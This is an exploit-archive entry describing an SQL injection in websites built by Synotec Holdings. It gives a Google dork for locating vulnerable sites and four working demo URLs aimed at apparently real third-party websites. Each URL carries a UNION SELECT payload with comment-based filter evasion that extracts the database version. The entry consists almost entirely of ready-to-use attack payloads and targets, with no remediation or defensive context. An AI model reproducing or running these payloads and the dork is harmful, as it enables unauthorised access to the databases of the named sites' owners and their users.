Synotec Holdings Sql Injection Vulnerability

2020.09.14

behrouz mansoori (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."

# Exploit Title: Synotec Holdings Sql Injection Vulnerability
# Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."
# Date: 2020-09-12
# Exploit Author: Behrouz Mansoori
# Vendor Homepage: https://www.synotec.lk
# Category: Webapps
# Tested on: Windows 10
=======================================
Proof of Concept:
Search google Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."
[+]Demo 1:
https://www.applevacations.com.co/view-city.php?id=-11%20/*!12345union*/%20/*!12345select*/%201,version(),3,4,5--
[+]Demo 2:
https://samara.lk/view-product.php?id=-46%20%23SALAMMMMM%0Aunion%20%23SALAMMMMM%0Aselect%201,2,version(),4,5,6,7--
[+]Demo 3:
http://www.unawatunadive.com/view-dive-courses.php?id=-1%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7,8--+
[+]Demo 4:
http://horizon-villa.com/view-facilities.php?id=-39%20/*!12345union*/%20select%201,version(),3,4,5,6--
#########################################################
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
#########################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Synotec Holdings Sql Injection Vulnerability

Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.